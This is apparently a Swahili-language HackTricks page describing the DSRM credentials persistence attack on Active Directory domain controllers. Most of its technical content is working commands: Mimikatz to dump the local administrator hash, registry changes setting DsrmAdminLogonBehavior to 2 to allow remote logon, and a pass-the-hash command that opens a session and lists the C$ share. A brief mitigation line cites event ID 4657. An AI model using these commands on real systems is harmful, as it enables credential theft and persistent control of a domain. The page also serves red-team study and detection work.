tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
DSRM Credentials
Kuna akaunti ya meneja wa ndani ndani ya kila DC. Ukiwa na haki za admin katika mashine hii unaweza kutumia mimikatz kutoa hash ya Meneja wa ndani. Kisha, kubadilisha rejista ili kuamsha nenosiri hili ili uweze kufikia kwa mbali mtumiaji huyu wa Meneja wa ndani.
Kwanza tunahitaji kutoa hash ya mtumiaji wa Meneja wa ndani ndani ya DC:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Kisha tunahitaji kuangalia kama akaunti hiyo itafanya kazi, na ikiwa ufunguo wa rejista una thamani "0" au haupo unahitaji kuweka kuwa "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Kisha, ukitumia PTH unaweza kuorodhesha maudhui ya C$ au hata kupata shell. Kumbuka kwamba kwa kuunda kikao kipya cha powershell na hash hiyo kwenye kumbukumbu (kwa PTH) "domain" inayotumika ni jina tu la mashine ya DC:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Zaidi ya habari kuhusu hii katika: https://adsecurity.org/?p=1714 na https://adsecurity.org/?p=1785
Kupunguza
- Kitambulisho cha Tukio 4657 - Ukaguzi wa uundaji/mabadiliko ya
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.